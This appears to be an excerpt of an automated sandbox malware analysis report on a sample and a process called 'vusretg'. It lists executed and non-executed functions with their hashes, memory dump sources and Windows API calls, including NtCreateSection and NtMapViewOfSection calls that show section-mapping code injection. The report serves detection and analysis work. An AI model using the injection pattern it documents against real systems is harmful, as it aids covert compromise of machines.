Instruction ID: 689da8ed0bf63c85a60a16fbbe407e4b0918199af58fa2149c0a58fdfe32668e
Opcode Fuzzy Hash: a8f77c5b0aafc3a83b6e9a89fc0125d54fce9978fbcf9d902b8238b221feffd7
Instruction Fuzzy Hash: 0E0181B6308105FADB115AD49D52FBA3719AB45751F30453BB613B80F2C53D8512FB2B

Uniqueness

Uniqueness Score: -1.00%

Function 00401992 Relevance: 1.3, APIs: 1, Instructions: 46sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00001388), ref: 004019B4

Part of subcall function 00401590: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401648
Part of subcall function 00401590: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401675
Part of subcall function 00401590: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401698

Memory Dump Source

Source File: 00000000.00000002.2123033267.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: 994369af4d0fa0c447a21c659804c9e18bb6abd6db9e85dcf8f049b878b9c4ba
Instruction ID: 9477092311c163758adf26378a137d016a4cc75b4861da4fd192d9fcf75081b0
Opcode Fuzzy Hash: 994369af4d0fa0c447a21c659804c9e18bb6abd6db9e85dcf8f049b878b9c4ba
Instruction Fuzzy Hash: 25016D72304105FADB119AD09C52EAA3729AB48355F30457BB613BD0F2C63D8552EB2B

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0084092B Relevance: 3.8, Strings: 3, Instructions: 90COMMON

Download Yara Rule

Strings

GetProcAddress., xrefs: 008409DC, 008409DF, 008409E4
l, xrefs: 00840966
., xrefs: 0084095F

Memory Dump Source

Source File: 00000000.00000002.2123436882.0000000000840000.00000040.00001000.00020000.00000000.sdmp, Offset: 00840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_file.jbxd

Yara matches

Similarity

API ID:
String ID: .$GetProcAddress.$l
API String ID: 0-2784972518
Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
Instruction ID: a331c924a8266b12c4c818ed0aaa2426c481ba71ed02c3d6dcb2ed812f944728
Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
Instruction Fuzzy Hash: 2B3137B6910609DFDB10CF99C880AAEBBF5FF48328F24414AD541E7211D771AA45CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 00403383 Relevance: .1, Instructions: 103COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2123033267.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 26fb4da1840ed3fa43355afb3d3ec25720aba801645bb0bff97b360b89783932
Instruction ID: 34acfb02a47dbd122777ee66dd236e6f513f1d99919dbdb33992e2827734b388
Opcode Fuzzy Hash: 26fb4da1840ed3fa43355afb3d3ec25720aba801645bb0bff97b360b89783932
Instruction Fuzzy Hash: 3331236184C2C14FCB571B3408A45E5BF7999A372270956FBC481AF9E7D63D8F07824A

Uniqueness

Uniqueness Score: -1.00%

Function 008F0D92 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2123714329.00000000008EA000.00000040.00000020.00020000.00000000.sdmp, Offset: 008EA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8ea000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction ID: 0e31c006fde74ac736931838ad0fe4b57b5dfd479da7330f2ef7762db495efbb
Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction Fuzzy Hash: 38118E72340108AFD754DFA9DC91EA673EAFB88360B298165EE04CB312D675EC01CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00840D90 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2123436882.0000000000840000.00000040.00001000.00020000.00000000.sdmp, Offset: 00840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
Instruction ID: d056108fe337393ff861ab54fb4f6a27d31e02048e04b7f8a7846f92259bad79
Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
Instruction Fuzzy Hash: 1201DF72A006088FDB21CF60C804BAB33B5FB86306F1545A4DA0AD7281E370A9458F80

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: vusretgPID: 2820, Parent PID: 1068COMMON

Execution Graph

Execution Coverage:	6.3%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	98
Total number of Limit Nodes:	4

Executed Functions

Function 00401590 Relevance: 10.7, APIs: 7, Instructions: 203
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401648
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401675
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401698
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016B6
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016F7
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401728
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 0040174A

Memory Dump Source

Source File: 00000005.00000002.2370319744.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_vusretg.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 569c601533bfa5fc76acd0aceccd82dced2ec0ba9158162e35254d0d933d7b6e
Instruction ID: d6964195f2ae178c179c3b7a32e304a619fe45f2cb2dcf097c8130f3d204b23e
Opcode Fuzzy Hash: 569c601533bfa5fc76acd0aceccd82dced2ec0ba9158162e35254d0d933d7b6e
Instruction Fuzzy Hash: 64616FB0904205FFEB208F91CC58FAF7BB8EF81710F10416AFA12BA1E5D6749941DB65

Uniqueness

Uniqueness Score: -1.00%

Function 0040159B Relevance: 10.7, APIs: 7, Instructions: 173
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401648
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401675
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401698
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016B6
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016F7
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401728
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 0040174A

Memory Dump Source

Source File: 00000005.00000002.2370319744.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_vusretg.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: bae20a228bd41bc7813985564ad54ad8a6399e0ad18c72377fec9941621639a0
Instruction ID: ff81ed2e81490e93a7bfe721f9c6a4d9304ec08e35c355afa89281eda0ffd623
Opcode Fuzzy Hash: bae20a228bd41bc7813985564ad54ad8a6399e0ad18c72377fec9941621639a0
Instruction Fuzzy Hash: 3E5109B5900249BFEB208F91CC49FAB7BB8FF85710F144169FA11BA2E5D6749941CB24

Uniqueness

Uniqueness Score: -1.00%

Function 004015B0 Relevance: 10.7, APIs: 7, Instructions: 169
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401648
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401675
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401698
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016B6
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016F7
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401728
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 0040174A

Memory Dump Source

Source File: 00000005.00000002.2370319744.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_vusretg.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 6c4736dca5741fb18473fdef31891e556f9b158cac04651ef2a3a7cb79a50736
Instruction ID: af686ae4933c2f6004de28669cc23aaadd0110c3f88d1b974755b8c34b4799b2
Opcode Fuzzy Hash: 6c4736dca5741fb18473fdef31891e556f9b158cac04651ef2a3a7cb79a50736
Instruction Fuzzy Hash: 0E51F9B5900249BFEB208F91CC48FAF7BB8FF85B10F104169FA11BA2E5D6749941CB24

Uniqueness

Uniqueness Score: -1.00%

Function 004015BC Relevance: 10.7, APIs: 7, Instructions: 168
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401648
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401675
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401698
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016B6
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016F7
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401728
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 0040174A

Memory Dump Source

Source File: 00000005.00000002.2370319744.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_vusretg.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 72661907227a9452eb25ab953c02bdcf5a827517e06e297a0d085dc110f4c5bf
Instruction ID: 765dedf92b6036aea99e2596c7c6646b0bcbba97602321f23575c560d9e65fb8
Opcode Fuzzy Hash: 72661907227a9452eb25ab953c02bdcf5a827517e06e297a0d085dc110f4c5bf
Instruction Fuzzy Hash: 1451E8B5900249BFEF208F91CC48FDF7BB8FF85B10F104169FA11AA2A5D6749945CB64

Uniqueness

Uniqueness Score: -1.00%

Function 004015CB Relevance: 10.7, APIs: 7, Instructions: 164
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401648
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401675
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401698
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016B6
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016F7
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401728
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 0040174A

Memory Dump Source

Source File: 00000005.00000002.2370319744.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_vusretg.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 004f83838c091370c792dd4fcb680897e20f1790ca1ffba750393c7614aa26f8
Instruction ID: 60f1a669064b898f2f8cfe764b4cdaf5e199705ebcb5ef48edc51869d28594cd
Opcode Fuzzy Hash: 004f83838c091370c792dd4fcb680897e20f1790ca1ffba750393c7614aa26f8
Instruction Fuzzy Hash: 2C51FAB1900249BFEF208F91CC48F9FBBB8FF85B10F104169FA11AA2A5D7749941CB24

Uniqueness

Uniqueness Score: -1.00%

Function 0076003C Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 515
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0076024D

Strings

kernel32.dll, xrefs: 0076008F, 00760095
cess, xrefs: 0076018D

Memory Dump Source

Source File: 00000005.00000002.2370645961.0000000000760000.00000040.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_760000_vusretg.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: cess$kernel32.dll
API String ID: 4275171209-1230238691
Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction ID: e7592e7f84c55ea775e29d54004374ecd9913ce804cec6b547e91cec81f2d018
Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction Fuzzy Hash: 3B527974A00229DFDB64CF58C984BA9BBB1BF09304F1480D9E90EAB351DB34AE94DF54

Uniqueness

Uniqueness Score: -1.00%

Function 0062EC4D Relevance: 3.0, APIs: 2, Instructions: 41
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 0062EC75
Module32First.KERNEL32(00000000,00000224), ref: 0062EC95

Memory Dump Source

Source File: 00000005.00000002.2370560967.0000000000628000.00000040.00000020.00020000.00000000.sdmp, Offset: 00628000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_628000_vusretg.jbxd

Yara matches

Similarity

API ID: CreateFirstModule32SnapshotToolhelp32
String ID:
API String ID: 3833638111-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: 376523d2a72f2fb233206379aacd56e50f31eb06d15415e5a6b42ffa3d6557f4
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: 39F0C232200B206BD7202BF9B98CAAE76EEAF49320F100538E652911C0CA71E8458E61

Uniqueness

Uniqueness Score: -1.00%

Function 00760E0F Relevance: 3.0, APIs: 2, Instructions: 15
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE(00000400,?,?,00760223,?,?), ref: 00760E19
SetErrorMode.KERNELBASE(00000000,?,?,00760223,?,?), ref: 00760E1E

Memory Dump Source

Source File: 00000005.00000002.2370645961.0000000000760000.00000040.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_760000_vusretg.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction ID: 39821a217816a7f5344c70d646fc942040b13633ca22255bef99017fbef1404d
Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction Fuzzy Hash: 89D0123154512877D7003A94DC09BCE7B1CDF05B62F008411FB0DD9080C775994046E5

Uniqueness

Uniqueness Score: -1.00%

Function 004029BA Relevance: 1.6, APIs: 1, Instructions: 60
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00402A18

Memory Dump Source

Source File: 00000005.00000002.2370319744.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_vusretg.jbxd

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 8b4368bb53e1649655da800b8e3771367f61da053ffbe47dde7c34dc5595736a
Instruction ID: ddfd821467dba8d9e3be05996510f596060048204c77d2b9bdf6330f9e046059
Opcode Fuzzy Hash: 8b4368bb53e1649655da800b8e3771367f61da053ffbe47dde7c34dc5595736a
Instruction Fuzzy Hash: 5C11E571708104E7D6209A449B4EF6B3724AB50B00F308077E5077A1C0D9FD9A07BBAF

Uniqueness

Uniqueness Score: -1.00%

Function 004029C5 Relevance: 1.6, APIs: 1, Instructions: 55
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00402A18

Memory Dump Source

Source File: 00000005.00000002.2370319744.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_vusretg.jbxd

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 630f67e63f4c9d6cadc1f4ef28869250e9dd95ac73f78134dda1cef590dfe083
Instruction ID: eda82e36109819710fc28ef01b941f30aa1b457bd77d6c907d6690057fca41fa
Opcode Fuzzy Hash: 630f67e63f4c9d6cadc1f4ef28869250e9dd95ac73f78134dda1cef590dfe083
Instruction Fuzzy Hash: 3C01C471708205E7DA60DA949A4EB6B7710AB51B10F308077E5037A1C4DAFD9A07FB6B

Uniqueness

Uniqueness Score: -1.00%

Function 004029D1 Relevance: 1.6, APIs: 1, Instructions: 54
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00402A18

Memory Dump Source

Source File: 00000005.00000002.2370319744.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_vusretg.jbxd

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 8aebd7c2dfb35844096bdf04bcf18f9291abc38b44631a4f8f553a04b448b611
Instruction ID: 27f311fed6bd4bb195386d6e886048742e5b6b48a655c0a394e70793ed6bf28f
Opcode Fuzzy Hash: 8aebd7c2dfb35844096bdf04bcf18f9291abc38b44631a4f8f553a04b448b611
Instruction Fuzzy Hash: E0018071708105E7DA609A449B4EB6B7324BB50B10F308477E5077A1C4DAFD9A07BB6F

Uniqueness

Uniqueness Score: -1.00%

Function 004029D5 Relevance: 1.6, APIs: 1, Instructions: 51
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00402A18

Memory Dump Source

Source File: 00000005.00000002.2370319744.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_vusretg.jbxd

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 14f9d75437b26c4e33ab762a249f6d4a6897a4cf10a17b4738070ea496484bd2
Instruction ID: 6c082c2f6db60d75b034223dafbed04b71575a1e0537fab93527f59567f6cb96
Opcode Fuzzy Hash: 14f9d75437b26c4e33ab762a249f6d4a6897a4cf10a17b4738070ea496484bd2
Instruction Fuzzy Hash: DB01B531708105E7DB60DA409A4DF5F7720BB50B10F208577E5077A1C4DAF99A17EB9B

Uniqueness

Uniqueness Score: -1.00%

Function 004029E2 Relevance: 1.5, APIs: 1, Instructions: 47
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00402A18

Memory Dump Source

Source File: 00000005.00000002.2370319744.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_vusretg.jbxd

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: b2d371f82e3e545a267ab12f2e2f0a58ec4b54f775fd64736b106f9591d7a7c3
Instruction ID: daf8977218c418413866257df5c9087131837fd98e0c4230724de407841e0162
Opcode Fuzzy Hash: b2d371f82e3e545a267ab12f2e2f0a58ec4b54f775fd64736b106f9591d7a7c3
Instruction Fuzzy Hash: 3801DF31708104E7DB209A848A4DB5E7320AB40B10F208577E507BA1C0DAF9AA07AFAB

Uniqueness

Uniqueness Score: -1.00%

Function 004029E9 Relevance: 1.5, APIs: 1, Instructions: 47
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00402A18

Memory Dump Source

Source File: 00000005.00000002.2370319744.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_vusretg.jbxd

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 9850a57f899f03cbeedeed8d531e786c982b6ed5f0a372be87f463e87495e5bd
Instruction ID: 5524fd7572365f35614fa46947343296b9db081daee3b4d0816b59f029c0b045
Opcode Fuzzy Hash: 9850a57f899f03cbeedeed8d531e786c982b6ed5f0a372be87f463e87495e5bd
Instruction Fuzzy Hash: 2101A731704104E7D7209A448A4EB5E7720AB40704F208477E5067A1C4DAB9EA07AB6B

Uniqueness

Uniqueness Score: -1.00%

Function 004029F9 Relevance: 1.5, APIs: 1, Instructions: 45
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00402A18

Memory Dump Source

Source File: 00000005.00000002.2370319744.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_vusretg.jbxd

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 83fdb88ab79b739a001a2e8c05ea2e4136fbf27434a3016a2f3de2c8c28590ed
Instruction ID: 2a527b723104a8d4642483acce18f9de5ed6d5a74c4e47f32731208c7d716ef4
Opcode Fuzzy Hash: 83fdb88ab79b739a001a2e8c05ea2e4136fbf27434a3016a2f3de2c8c28590ed
Instruction Fuzzy Hash: 1801A231708104E7DB209A849A4DF9F7720AB40B14F208477E5027A1C0DAF9AA07AFAB

Uniqueness

Uniqueness Score: -1.00%

Function 00401969 Relevance: 1.3, APIs: 1, Instructions: 62sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00001388), ref: 004019B4

Part of subcall function 00401590: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401648
Part of subcall function 00401590: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401675
Part of subcall function 00401590: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401698

Memory Dump Source

Source File: 00000005.00000002.2370319744.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_vusretg.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: b8285f967374eae4a3c51efe3ce59b098afe428af0dcb557450618fb68c9c18d
Instruction ID: 1276e484f00ba66cbffb4616bb4d5d076efec51046982770477825c9afbd6400
Opcode Fuzzy Hash: b8285f967374eae4a3c51efe3ce59b098afe428af0dcb557450618fb68c9c18d
Instruction Fuzzy Hash: 0F01D2B6708205FADB005A949C62EBB3618AB41755F300637BA13B80F1C57D8513FA6F

Uniqueness

Uniqueness Score: -1.00%

Function 00401975 Relevance: 1.3, APIs: 1, Instructions: 55sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00001388), ref: 004019B4

Part of subcall function 00401590: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401648
Part of subcall function 00401590: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401675
Part of subcall function 00401590: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401698

Memory Dump Source

Source File: 00000005.00000002.2370319744.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_vusretg.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: 9a4c6db62cce5b151e284cc19e63a433146ff3755d8681b35f1a2b6972971a8e
Instruction ID: 0230620869f43b82b90ed4dddf49477c9f5c6c73dade890abd4ec4b7d4a8195a
Opcode Fuzzy Hash: 9a4c6db62cce5b151e284cc19e63a433146ff3755d8681b35f1a2b6972971a8e
Instruction Fuzzy Hash: 4801BCB6308205FADB005A949C62FBA3219AB84751F30053BB613BC0F1C53D8513FA2F

Uniqueness

Uniqueness Score: -1.00%

Function 0040197F Relevance: 1.3, APIs: 1, Instructions: 54sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00001388), ref: 004019B4

Part of subcall function 00401590: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401648
Part of subcall function 00401590: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401675
Part of subcall function 00401590: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401698

Memory Dump Source

Source File: 00000005.00000002.2370319744.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_vusretg.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: 25088a1f844088f741a859eeb607afc94706ffd20a91742bc3d9f24c23efa0b5
Instruction ID: 9a4b4ffd5ca22a672d673467c452b15ea5c40039b4ea8ded510267d200494456
Opcode Fuzzy Hash: 25088a1f844088f741a859eeb607afc94706ffd20a91742bc3d9f24c23efa0b5
Instruction Fuzzy Hash: 3A01B1B6308205FADB115A949C61A7A3319AB45711F30053BB613B80F2C53D8512FA1F

Uniqueness

Uniqueness Score: -1.00%

Function 00401986 Relevance: 1.3, APIs: 1, Instructions: 53sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00001388), ref: 004019B4

Part of subcall function 00401590: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401648
Part of subcall function 00401590: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401675
Part of subcall function 00401590: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401698

Memory Dump Source

Source File: 00000005.00000002.2370319744.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_vusretg.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: f146987f8c0bf49c3ef7592727f3e0a51ae856d021a330616d03f7304a9c3b71
Instruction ID: 5a2bb716a64f0a1f1a6e426f0b200f3e6862a670896c4db1e76ea4af0659c5ba
Opcode Fuzzy Hash: f146987f8c0bf49c3ef7592727f3e0a51ae856d021a330616d03f7304a9c3b71
Instruction Fuzzy Hash: 3101DFB2308205FADB005AD49C62F7A3219AB85715F30453BB623B80F1C63D8512FB2F

Uniqueness

Uniqueness Score: -1.00%

